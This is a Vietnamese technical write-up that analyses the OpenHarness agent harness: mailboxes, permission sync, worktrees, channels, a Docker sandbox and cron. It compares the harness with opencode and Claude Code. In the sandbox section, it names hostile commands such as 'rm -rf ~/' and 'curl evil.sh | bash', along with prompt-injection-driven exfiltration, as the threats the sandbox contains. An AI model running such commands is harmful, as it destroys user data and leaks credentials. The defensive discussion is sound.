poll(self, interval=0.25): """Yield envelopes as they
arrive. Caller deletes after consume.""" while
True: for msg_path in sorted(self.inbox.glob("*.json")): try: envelope =
json.loads(msg_path.read_text()) except
json.JSONDecodeError: continue #
partial write? skip yield envelope
msg_path.unlink(missing_ok=True) await asyncio.sleep(interval) #
Envelope types (message kinds) # {"kind":
"user_message", "text": "..."} # {"kind":
"permission_request", "request_id": "...", "tool": "...", "args":
{...}} # {"kind": "shutdown", "reason":
"..."} # {"kind": "tool_result", "tool": "...",
"result": ..., "is_error": bool} .tmp → rename) đảm bảo
reader không bao giờ thấy partial file — rename là atomic trên
POSIX. Sort-key nano-second đảm bảo thứ tự delivery. Poll loop đơn giản
(không cần fsnotify) — latency 250ms acceptable. Envelope kind enum →
message-kind routing trong consumer. Không cần Redis/RabbitMQ/Kafka →
scale đến ~10 agent thoải mái.Code example (generic)
import os, json, uuid, time, asyncio
from pathlib import Path
class FileMailbox: def __init__(self, inbox: Path):
self.inbox = inbox; inbox.mkdir(parents=True,
exist_ok=True) def send(self, msg: dict): sort_key = f"{time.time_ns():020d}" mid =
uuid.uuid4().hex[:8] tmp = self.inbox / f"{sort_key}-{mid}.tmp" final =
self.inbox / f"{sort_key}-{mid}.json" tmp.write_text(json.dumps(msg))
os.rename(tmp, final) # atomic async def receive(self): while True: for p in sorted(self.inbox.glob("*.json")): msg = json.loads(p.read_text()) p.unlink()
yield msg await
asyncio.sleep(0.25)
Ưu điểm
- Zero-infra (không cần message broker)
- Atomic rename — no partial reads
- FIFO order qua nanosecond sort key
- Inspectable bằng filesystem tools (ls, cat)
Nhược điểm
- Poll interval 250ms → latency floor
- Filesystem bottleneck khi nhiều agent
- Không persistence across machine (no remote)
- Cần cleanup stale message nếu reader crash
T24. Dual-channel permission sync protocol
F.3src/openharness/swarm/permission_sync.py · Channels: file (pending/ + resolved/) + mailboxCode từ OpenHarness
import
json, time from pathlib import Path class PermissionSync: """Worker writes
pending request; Leader resolves by writing resolution.""" def __init__(self, team_dir:
Path, agent_id: str): self.pending_dir = team_dir / "permissions" / "pending"
self.resolved_dir = team_dir / "permissions" /
"resolved" self.pending_dir.mkdir(parents=True, exist_ok=True)
self.resolved_dir.mkdir(parents=True,
exist_ok=True) self.agent_id = agent_id async def worker_request(self,
tool: str, tool_input: dict, *, timeout=300):
"""Called by worker: write pending request; wait for
resolution file.""" request_id = uuid.uuid4().hex # Fast-path: read-only tools auto-approved without leader
involvement if
_is_read_only_heuristic(tool, tool_input): return
PermissionResolution(approved=True, reason="read-only") pending_file = self.pending_dir / f"{request_id}.json"
resolved_file = self.resolved_dir / f"{request_id}.json"
pending_file.write_text(json.dumps({ "request_id": request_id, "agent_id": self.agent_id, "tool": tool, "tool_input":
tool_input, "ts": time.time(), })) # Also send notification via mailbox for low-latency
wake-up await
self._notify_leader_via_mailbox(request_id) # Poll for
resolution deadline = time.time() + timeout while time.time() < deadline: if resolved_file.exists(): data =
json.loads(resolved_file.read_text()) pending_file.unlink(missing_ok=True) resolved_file.unlink(missing_ok=True) return
PermissionResolution(**data) await
asyncio.sleep(0.25) return PermissionResolution(approved=False, reason="timeout") def leader_resolve(self,
request_id: str, approved: bool, *, reason=""):
"""Called by leader (main UI) when user
approves/denies.""" resolved_file = self.resolved_dir / f"{request_id}.json" tmp =
resolved_file.with_suffix(".tmp")
tmp.write_text(json.dumps({"approved": approved,
"reason": reason})) os.rename(tmp,
resolved_file) Code example (generic)
import os, json, time, asyncio, uuid class PermSync: def __init__(self, pending_dir,
resolved_dir): self.p = pending_dir; self.r = resolved_dir async def worker_wait(self,
tool, args, timeout=300): rid = uuid.uuid4().hex
(self.p / f"{rid}.json").write_text(json.dumps({"tool": tool, "args": args}))
resolved = self.r / f"{rid}.json" deadline = time.time() + timeout while time.time() < deadline: if resolved.exists(): data =
json.loads(resolved.read_text()) resolved.unlink() return data["approved"] await asyncio.sleep(0.25) return False def leader_resolve(self, rid, approved): tmp = self.r /
f"{rid}.tmp"
tmp.write_text(json.dumps({"approved":
approved})) os.rename(tmp, self.r / f"{rid}.json")
Ưu điểm
- Persistent + auditable — crash-resilient
- Dual channel (file persist + mailbox latency)
- Read-only heuristic giảm leader load
- Atomic rename ở leader side
Nhược điểm
- Poll loop 250ms floor — không real-time
- Stale pending file nếu worker crash
- Heuristic "read-only" có thể miss case
- Không có request priority / queue
T25. Git worktree isolation per agent
F.4src/openharness/swarm/worktree.py · Lines: 1–80 · Slug: max 64 chars, [a-zA-Z0-9._-]Code từ OpenHarness
import
asyncio, re from pathlib import Path SLUG_RE = re.compile(r"^[a-zA-Z0-9._-]+$")
MAX_SLUG_LEN = 64 def
validate_slug(slug: str) -> str: """Reject .., absolute paths, and control chars."""
if not slug or len(slug)
> MAX_SLUG_LEN: raise ValueError(f"slug length must be
1..{MAX_SLUG_LEN}") if not
SLUG_RE.match(slug): raise ValueError(f"invalid slug: {slug!r}")
if ".." in slug or
slug.startswith(("/", "-")): raise ValueError(f"slug must not traverse or start with
/-: {slug!r}") return slug async def create_worktree(repo_root: Path, slug: str, *, base_ref:
str = "HEAD") -> Path: """Create a shallow worktree for subagent isolation."""
slug = validate_slug(slug) worktree_path = repo_root / ".openharness" / "worktrees" /
slug branch = f"openharness/swarm/{slug}" # Reuse
existing worktree if slug already exists if
worktree_path.exists(): return worktree_path
worktree_path.parent.mkdir(parents=True,
exist_ok=True) cmd = ["git", "-C", str(repo_root), "worktree",
"add", "--quiet", "-b", branch, str(worktree_path), base_ref] proc = await asyncio.create_subprocess_exec( *cmd,
stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE, ) _,
stderr = await proc.communicate() if proc.returncode != 0: raise RuntimeError(f"git worktree add failed: {stderr.decode()}") return worktree_path async def
remove_worktree(repo_root: Path, slug: str, *,
force: bool = False): """Remove
a worktree; orphan branch left as cleanup-later.""" slug =
validate_slug(slug) worktree_path = repo_root / ".openharness" / "worktrees" /
slug args = ["git", "-C", str(repo_root), "worktree", "remove", str(worktree_path)] if force:
args.append("--force") ... .git object database (hiệu quả disk). Sau khi agent xong,
merge branch về main. Slug validation ngăn path traversal
(..) — quan trọng khi slug đến từ LLM input. Branch prefix
openharness/swarm/ để dễ cleanup và không va chạm với dev
branch.Code example (generic)
import asyncio, re from pathlib
import Path SLUG_RE = re.compile(r"^[a-zA-Z0-9._-]{1,64}$")
async def make_worktree(repo: Path, slug: str, base="HEAD") -> Path: if not
SLUG_RE.match(slug) or ".." in slug: raise ValueError("bad slug") wt
= repo / ".worktrees" / slug if wt.exists(): return wt branch
= f"agent/{slug}" proc =
await asyncio.create_subprocess_exec( "git", "-C", str(repo), "worktree", "add", "-b", branch, str(wt), base, stdout=asyncio.subprocess.DEVNULL,
stderr=asyncio.subprocess.PIPE, ) _, err = await
proc.communicate() if proc.returncode != 0: raise
RuntimeError(err.decode()) return wt
Ưu điểm
- True file isolation — mỗi agent có riêng checkout
- Share .git objects → disk efficient
- Mỗi branch experiment độc lập
- Slug validation tránh path traversal
Nhược điểm
- Git worktree overhead ~100-500ms mỗi spawn
- Cleanup thủ công khi agent crash → orphan branch
- Không work với submodule + LFS clean
- Disk space nhân lên khi working tree lớn
T26. YAML agent definitions + coordinator dispatch
F.5src/openharness/coordinator/agent_definitions.py · Load: .openharness/agents/*.yamlCode từ OpenHarness
import
yaml from pathlib import
Path from pydantic import
BaseModel from openharness.permissions.modes import PermissionMode class
AgentDefinition(BaseModel): name: str
description: str system_prompt: str tools: list[str] = [] # allowlist (empty = all) disallowed_tools: list[str] =
[] # denylist model: str = "claude-sonnet-4-6" effort: str = "medium" # low/medium/high
permission_mode: PermissionMode = PermissionMode.DEFAULT max_turns: int |
None = 50 color: str =
"cyan" isolation: str = "none" # "none" | "worktree"
def load_agent_definitions(cwd: Path) -> dict[str,
AgentDefinition]: defs = {} for location in [ cwd / ".openharness" /
"agents", Path.home() / ".openharness" / "agents", ]:
if not location.is_dir(): continue for f in sorted(location.glob("*.yaml")): data = yaml.safe_load(f.read_text()) for entry in (data if isinstance(data, list) else
[data]): defn = AgentDefinition(**entry) defs[defn.name] = defn return defs # Example agent definition
YAML: # name: doc-writer # description: Writes technical documentation # system_prompt: | # You are a doc
writer. Focus on clarity, accuracy, and structure. # tools: [Read, Write, Grep, Glob] #
permission_mode: plan # cannot mutate #
max_turns: 30 # isolation: worktree # get own
worktree class Coordinator: """Central router:
decide which agent handles an incoming task.""" def __init__(self, definitions:
dict[str, AgentDefinition]): self.definitions = definitions self.manager =
BackgroundTaskManager() async def dispatch(self, task_description: str, preferred_agent:
str | None = None): defn =
self.definitions.get(preferred_agent) or
self._pick_agent(task_description) worktree = await create_worktree(...) if
defn.isolation == "worktree" else None return await
self.manager.create_agent_task(defn, worktree=worktree) preferred_agent name hint), spawn với config tương ứng.
isolation: worktree kích hoạt T25 (git worktree). Permission
mode per-agent nghĩa một agent có thể plan (research only)
trong khi agent khác full_auto (background CI worker). Rất
giống pattern Claude Code subagents.Code example (generic)
import yaml from pathlib import Path from pydantic import BaseModel
class AgentDef(BaseModel): name: str; description: str;
system_prompt: str tools: list[str] = [] model: str = "claude-sonnet-4-6" max_turns: int = 50 isolation: str = "none"
def load_defs(dir: Path)
-> dict[str, AgentDef]: out = {} for f in sorted(dir.glob("*.yaml")): d = yaml.safe_load(f.read_text()) for entry in (d if isinstance(d, list) else
[d]): defn = AgentDef(**entry) out[defn.name] = defn return out class Coordinator: async def dispatch(self, task: str, agent_name: str): defn =
self.defs[agent_name] wt = await
make_worktree(repo, agent_name) if defn.isolation
== "worktree" else None
return await self.spawn(defn, wt,
task)
Ưu điểm
- Declarative — YAML git-friendly
- Agents can be shared across team (commit to repo)
- Per-agent tools + mode + model
- Coordinator routing dễ extend
Nhược điểm
- Agent selection heuristic chưa rõ — có thể pick sai
- YAML dễ lỗi indent, không có schema warning sớm
- Không có version/compat cho definition
- Agent chain (A → B → C) không first-class
G. External Integrations 4 kỹ thuật · phần lớn MỚI vs opencode
T27. Multi-channel bus (Slack/Feishu/Discord/Telegram/Matrix)
G.1src/openharness/channels/bus/queue.py · src/openharness/channels/impl/* · Core: MessageBus với 2 asyncio.Queue (inbound/outbound)Code từ OpenHarness
import
asyncio from dataclasses import dataclass @dataclass
class ChannelMessage:
channel: str # "slack" | "feishu" | "discord" |
... source_id: str # channel-specific thread /
room user: str text: str raw: dict # adapter
payload gốc class MessageBus: """Single agent, many
channels. Inbound từ N channel → 1 queue, outbound từ agent → fan-out về
đúng channel qua source_id.""" def __init__(self): self.inbound:
asyncio.Queue[ChannelMessage] = asyncio.Queue(maxsize=1024) self.outbound:
asyncio.Queue[tuple[str, str, str]] = asyncio.Queue() self._channels:
dict[str, ChannelAdapter] = {} def register(self, name: str, adapter: ChannelAdapter):
self._channels[name] = adapter async def start(self): tasks = [asyncio.create_task(c.run(self))
for c in
self._channels.values()]
tasks.append(asyncio.create_task(self._outbound_dispatcher())) await asyncio.gather(*tasks, return_exceptions=True) async def _outbound_dispatcher(self): while True: channel, source_id,
text = await self.outbound.get() adapter =
self._channels.get(channel) if adapter: await adapter.send(source_id, text) #
Feishu adapter — WebSocket long-connection với payload 40KB class FeishuAdapter(ChannelAdapter): MAX_PAYLOAD = 40_000
# ~40KB per interactive card async def run(self, bus:
MessageBus): client = lark.ws.Client(app_id=..., app_secret=...,
event_handler=lambda evt: self._on_event(evt,
bus)) await client.start() ChannelMessage. Outbound dispatcher lo chuyện format lại (ví
dụ: Feishu cards, Slack Block Kit, Discord embed). Đây là cơ sở cho
personal agent always-on (ohmo): user ping từ bất cứ đâu, agent
respond đúng context.Code example (generic)
import asyncio from abc import ABC,
abstractmethod class ChannelAdapter(ABC): @abstractmethod async def
run(self, bus): ... @abstractmethod async def
send(self, source_id: str, text: str): ... class SlackAdapter(ChannelAdapter): def __init__(self, token):
self.app = AsyncApp(token=token) self.app.event("message")(self._on_message) async
def _on_message(self, event, say, bus):
await bus.inbound.put(ChannelMessage(
channel="slack", source_id=event["channel"], user=event["user"], text=event["text"],
raw=event, )) async def send(self, source_id, text): await
self.app.client.chat_postMessage(channel=source_id, text=text) # Dùng một agent cho Slack + Discord đồng thời async def main(): bus =
MessageBus() bus.register("slack",
SlackAdapter(token="xoxb-..."))
bus.register("discord",
DiscordAdapter(token="...")) async def agent_loop(): while True: msg = await bus.inbound.get() reply = await llm_reply(msg.text, user=msg.user) await bus.outbound.put((msg.channel, msg.source_id,
reply)) await asyncio.gather(bus.start(),
agent_loop())
Ưu điểm
- Single-agent, multi-channel — DRY adapter code
- Inbound queue có backpressure (maxsize=1024)
- Adapter dễ swap (dev → Slack, prod → Feishu)
- Channel ID theo
(channel, source_id)giữ context thread
Nhược điểm
- Channel-specific features (rich card, reaction, ephemeral) khó trừu tượng
- Adapter tự xử lý rate-limit — không có central limiter
- State per-thread chưa tách biệt (nếu không cẩn thận, user A có thể thấy reply của user B)
- Outbound truncation (Feishu 40KB, Slack 40KB block) cần adapter lo
T28. LSP-based code intelligence qua AST
G.2src/openharness/services/lsp/__init__.py · Lines: 1–100 · API: list_document_symbols, workspace_symbol_search, go_to_definition, find_references, hoverCode từ OpenHarness
import ast
from pathlib import Path
def list_document_symbols(file_path: Path) ->
list[Symbol]: """Trả về top-level functions, classes,
methods trong 1 file Python qua ast.parse() — không cần spawn language
server ngoài.""" source = file_path.read_text(encoding="utf-8", errors="replace")
try: tree = ast.parse(source) except SyntaxError: return []
symbols = [] for node in
ast.walk(tree): if isinstance(node,
(ast.FunctionDef, ast.AsyncFunctionDef)): symbols.append(Symbol(
name=node.name, kind="function",
line=node.lineno, col=node.col_offset, )) elif
isinstance(node, ast.ClassDef): symbols.append(Symbol( name=node.name,
kind="class", line=node.lineno,
col=node.col_offset, )) for item in node.body: if
isinstance(item, (ast.FunctionDef, ast.AsyncFunctionDef)):
symbols.append(Symbol( name=f"{node.name}.{item.name}", kind="method", line=item.lineno, col=item.col_offset, ))
return symbols def workspace_symbol_search(root: Path, query: str) ->
list[Symbol]: """Search symbol name across all *.py
files — case-insensitive substring.""" results = [] for py_file in root.rglob("*.py"): if
any(part.startswith(".") for part in py_file.parts):
continue for sym in list_document_symbols(py_file): if query.lower() in
sym.name.lower(): results.append(sym._replace(file=py_file)) return results pyright/pylsp (heavy, cần config, khởi động
chậm), OpenHarness dùng Python stdlib ast để
tự parse read-only. Trade-off: không có type inference, không theo được
import qua package, nhưng đủ dùng cho 80% use case của agent (tìm
function, class, method signature). Agent gọi
workspace_symbol_search("handle_message") thay vì grep
-rn "def handle_message" — kết quả structured, có line/col chính
xác.Code example (generic)
import ast from pathlib import Path def find_function_definition(file: Path, name: str) ->
tuple[int, int] | None:
try: tree = ast.parse(file.read_text()) except SyntaxError: return None for node in ast.walk(tree): if
isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)) \ and node.name == name: return
(node.lineno, node.col_offset) return None def find_references(root: Path, name: str) -> list[tuple[Path, int]]: """Approximate:
tìm Name/Attribute có id trùng.""" hits = [] for py in root.rglob("*.py"): try: tree =
ast.parse(py.read_text()) except SyntaxError:
continue for node in ast.walk(tree): if
isinstance(node, ast.Name) and node.id == name:
hits.append((py, node.lineno)) elif
isinstance(node, ast.Attribute) and node.attr ==
name: hits.append((py, node.lineno)) return hits
Ưu điểm
- Zero-dep (chỉ stdlib
ast) — không cần LSP server - Read-only, không có side effect → an toàn cho agent tool
- Line/col chính xác, structured output
- Parse 1 file < 10ms kể cả file lớn
Nhược điểm
- Chỉ hiểu syntax, không có type/semantic
- Go-to-definition qua
importphải tự resolve - Chỉ support Python (các ngôn ngữ khác cần adapter riêng)
- Không catch được macro/meta-class magic
T29. Docker sandbox cho tool execution
G.3src/openharness/sandbox/docker_backend.py · Container: openharness-sandbox-<session_id> · Optional: --sandbox docker flagCode từ OpenHarness
import
docker from docker.errors import DockerException class
DockerSandbox: """Wrap tool
execution trong container isolated. Tool nhận được stdin/stdout qua
container exec, không thấy host filesystem trừ volume mount có kiểm
soát.""" def __init__(self, session_id: str, workdir: Path):
self.name = f"openharness-sandbox-{session_id}"
self.workdir = workdir self._client = None
self._container = None def
check_available(self) -> bool: """Pre-flight: Docker daemon running? Platform
supported?""" try: self._client =
docker.from_env(timeout=5) self._client.ping() return True except DockerException as e:
log.warning(f"Docker not available: {e}") return False async def start(self):
self._container = self._client.containers.run( image="openharness/sandbox:latest", name=self.name,
detach=True, stdin_open=True, tty=True,
network_mode="bridge", # có
net; dùng "none" nếu muốn offline mem_limit="2g", cpu_quota=100_000, # 1
CPU read_only=False, #
agent cần ghi vào /workspace volumes={ str(self.workdir): {"bind": "/workspace", "mode": "rw"}, },
working_dir="/workspace", environment={"OPENHARNESS_SANDBOX": "1"}, )
async def exec(self, cmd:
list[str], timeout: int = 600) -> ExecResult: if self._container is None: raise RuntimeError("sandbox not started") result =
self._container.exec_run( cmd=cmd, stdout=True,
stderr=True, demux=True, )
return ExecResult(exit_code=result.exit_code,
output=result.output) async def cleanup(self): if
self._container: self._container.remove(force=True) rm -rf ~/, curl evil.sh | bash, hay exfil
credentials. Docker sandbox cô lập: agent ghi vào /workspace
(volume), mọi thứ ngoài đó bị container file-system cover. Kết hợp với
network_mode (bridge/none), mem_limit,
cpu_quota, sandbox chặn cả "agent crazy → consume all
RAM" và "agent bị prompt injection → exfil". Pre-flight
check_available() cho phép graceful fallback về non-sandbox
nếu Docker thiếu (CI, VM nhỏ).Code example (generic)
import docker, tempfile, subprocess
def run_tool_in_container(cmd: list[str], workdir: str,
timeout: int = 60): client = docker.from_env() try: container = client.containers.run( "python:3.12-slim", cmd, volumes={workdir: {"bind": "/work", "mode": "rw"}},
working_dir="/work", mem_limit="512m", network_disabled=True,
# no egress remove=True,
# auto-cleanup detach=False, stdout=True, stderr=True, ) return
container.decode("utf-8", errors="replace") except
docker.errors.ContainerError as e: return f"[exit {e.exit_status}]:
{e.stderr.decode()}" # Fallback if Docker
missing def run_tool(cmd: list[str], workdir: str): if docker_available(): return
run_tool_in_container(cmd, workdir) return
subprocess.run(cmd, cwd=workdir, capture_output=True, text=True)
Ưu điểm
- Blast radius limited tới container → host an toàn
- Resource limits (mem/cpu/network) chặn DoS
- Reproducible env (image pin version)
- Optional — không ép Docker nếu user không có
Nhược điểm
- Cần Docker daemon — bỏ được một phần user (VM nhỏ, CI restricted)
- Overhead khởi động container (~1s) cho mỗi session
- Bind mount
/workspacerw — nếu attacker escape chroot, vẫn hạ host dir - Image
openharness/sandbox:latestphải được build & publish → supply-chain risk
T30. Cron scheduler + persistent background tasks
G.4src/openharness/tasks/manager.py · src/openharness/services/cron_scheduler.py · Storage: ~/.openharness/cron/registry.json + cron_history.jsonl · Tick: 30sCode từ OpenHarness
import
asyncio, json from datetime import datetime from croniter
import croniter @dataclass class CronJob: job_id: str name: str cron_expr: str # "*/30 * * * *" prompt: str # agent
prompt khi fire enabled: bool = True
last_run: str | None = None next_run: str | None =
None class CronScheduler: TICK = 30 #
seconds def __init__(self, registry_path: Path, history_path: Path):
self.registry_path = registry_path self.history_path = history_path
self.jobs: dict[str, CronJob] = self._load() def
_load(self) -> dict[str, CronJob]: if not
self.registry_path.exists(): return {} data =
json.loads(self.registry_path.read_text()) return
{j["job_id"]: CronJob(**j) for j in data} def _save(self):
self.registry_path.write_text(json.dumps( [asdict(j) for j in self.jobs.values()],
indent=2, )) async def run_forever(self, on_fire: Callable[[CronJob],
Awaitable]): while True:
now = datetime.utcnow() for job in list(self.jobs.values()): if
not job.enabled: continue
base = datetime.fromisoformat(job.last_run) if
job.last_run else now itr =
croniter(job.cron_expr, base) if
itr.get_next(datetime) <= now: asyncio.create_task(self._fire(job,
on_fire)) job.last_run = now.isoformat() self._save() await asyncio.sleep(self.TICK) async
def _fire(self, job: CronJob, on_fire):
try: result = await
on_fire(job) self._append_history({"job_id":
job.job_id, "fired_at":
datetime.utcnow().isoformat(), "ok": True, "result_preview":
result[:500]}) except Exception as e: self._append_history({"job_id": job.job_id, "ok":
False, "error": str(e)})
def _append_history(self,
entry: dict): with self.history_path.open("a") as f:
f.write(json.dumps(entry) + "\n")
Code example (generic)
import asyncio from apscheduler.schedulers.asyncio import AsyncIOScheduler from
apscheduler.triggers.cron import CronTrigger async def agent_job(prompt:
str): response = await run_agent(prompt)
save_history(prompt, response) async def main(): scheduler = AsyncIOScheduler() # Cron: Mon-Fri 09:00 scheduler.add_job( agent_job,
trigger=CronTrigger.from_crontab("0 9 * * 1-5"),
args=["Summarize overnight alerts"], id="daily-triage", replace_existing=True, ) scheduler.start() await
asyncio.Event().wait() # run forever
Ưu điểm
- Agent thành proactive assistant — không cần user ping
- Persist qua restart → reliability
- History log cho audit + debug
- Per-job enable/disable dễ pause khi maintenance
Nhược điểm
- Tick 30s miss cron <30s granularity
- Không distributed — nhiều instance chạy sẽ duplicate fire
- JSON registry không concurrent-safe (write qua rename cần thêm)
- Failure recovery phụ thuộc user đọc history — không có alert auto
Kết luận — So sánh OpenHarness · opencode · Claude Code
Sau 30 kỹ thuật, ta thấy rõ OpenHarness không chỉ là "Python port của Claude Code". Nó là một superset về khả năng automation, đánh đổi một phần bề mặt CLI elegance để mở rộng thành agent organization platform — nơi agent có thể sống trong subprocess độc lập, nghe từ N channel, chạy theo cron, và cô lập trong Docker.
Ba trục so sánh
| Khía cạnh | Claude Code (TS closed-source) | opencode (sst/anomalyco TS) | HKUDS/OpenHarness (Python) |
|---|---|---|---|
| Ngôn ngữ | TypeScript + Bun | TypeScript + Bun + Effect-TS | Python 3.10+ + asyncio |
| TUI | React Ink | React Ink | Rich/Textual + React Ink (dual) |
| Agent loop | ReAct async | ReAct async | ReAct async, single/parallel branching |
| Compaction | Auto-compact | Tail-preserving + template | Proactive + reactive + PTL retry |
| Sub-agent | Task tool in-session | Task tool in-session | Subprocess + worktree + mailbox |
| Permission | 3-mode + hook | Wildcard + arity + state | 3-mode + 6-layer + sensitive path |
| Memory | CLAUDE.md | CLAUDE.md | Per-project dir + MEMORY.md + search |
| Hooks | 6 events × 2 types | Hook + Tool Hook | 6 events × 4 types + hot reload |
| Skills | Markdown + frontmatter | Prompt + tool filter | Markdown + frontmatter + plugin |
| MCP | stdio + HTTP | stdio + HTTP | stdio + HTTP + dynamic Pydantic |
| Channels | CLI only | CLI only | Slack/Feishu/Discord/Telegram/Matrix |
| Autopilot | N/A | N/A | Dashboard + repo automation |
| Sandbox | N/A | N/A | Docker optional |
| Cron | N/A | N/A | Persistent scheduler (30s tick) |
| LSP | N/A | N/A | AST-based built-in |
Khi nào nên chọn OpenHarness
- Team quen Python, muốn fork/customize sâu (không bị lock vào JS ecosystem)
- Workflow cần long-running agent (Slack bot, cron triage, CI auto-fix)
- Muốn multi-agent coordination thật (leader + worker + branch isolation qua worktree)
- Cần sandbox Docker cho tool execution (compliance / security)
- Muốn persistent memory có cấu trúc (per-project MEMORY.md tìm được qua CJK tokenizer)
- Chỉ cần pair-programming CLI đơn thuần → opencode hay Claude Code đơn giản hơn
- Workflow monolithic, 1-agent-1-session — swarm + channels thành dead weight
- Team toàn TS → fork/contribute dễ hơn với opencode
Bài học harness engineering rút ra
OpenHarness chứng minh rằng scaffolding quan trọng không kém model. Ba nguyên tắc lặp lại trong code:
- Atomic write — mọi state-changing file
đều
write(.tmp) → rename(mailbox, registry, permission sync). Tránh partial-read race. - Layered evaluation — permission 6 layer, compaction 2 phase (proactive + reactive + PTL retry), prompt 9 section. Mỗi layer có chức năng riêng biệt, dễ reason về.
- Structured observability — streaming events với union type + 9-phase progress, JSONL history, hook pre/post → agent debug được qua log, không cần reproduce bằng tay.
Nếu bạn xây harness riêng, 5 ý tưởng nên copy từ OpenHarness ngay: (1) per-project memory hash, (2) CJK-aware tokenizer, (3) sensitive path hardcoded block, (4) subprocess + mailbox cho subagent, (5) dual-channel permission sync. Đó là những chi tiết rất dễ bỏ qua nếu chỉ nhìn "agent loop" ở high level, nhưng quyết định liệu harness có chạy được 24/7 trong production hay không.
Nguồn tham khảo
Repo & mã nguồn
- HKUDS/OpenHarness — repo chính
- HKUDS/OpenHarness — SHOWCASE
- HKUDS/ClawTeam — integration partner
- Awesome Harness Engineering
Harness engineering
- Martin Fowler — Harness engineering for coding agent users
- HumanLayer — Skill Issue: Harness Engineering for Coding Agents
- OpenAI — Harness engineering
- Avi Chawla — The Anatomy of an Agent Harness
Context, compaction & memory
- Microsoft Learn — Compaction
- JetBrains Research — Smarter Context Management
- Factory.ai — Compressing Context
- Morph — Compaction vs Summarization
- arXiv — Solving Context Window Overflow in AI Agents
Tool design & safety
MCP & plugins
- MCP — official spec
- MCP Python SDK
- Claude Code — Hooks
- Claude Code — Plugins
- Claude Code — Configure permissions
Multi-agent & swarm
- Anthropic — Multi-agent research system
- Google ADK — Multi-agent systems
- LangChain — Multi-agent docs
- OpenAI Swarm — Research
- AWS — Agents as Tools Pattern
Git worktree & IPC
- git-worktree docs
- Atlassian — Git Worktree Beginner Guide
- Shopify — Managing multiple branches with worktree
- EIP — Messaging Mailbox
Channels & LSP
- Slack Bolt Python SDK
- Feishu OAPI (lark-oapi)
- python-telegram-bot docs
- discord.py docs
- Microsoft LSP spec
- Python ast module docs
Sandbox & cron
- Docker Python SDK
- OWASP — Container Security Verification
- gVisor — Application kernel sandbox
- python-croniter
- APScheduler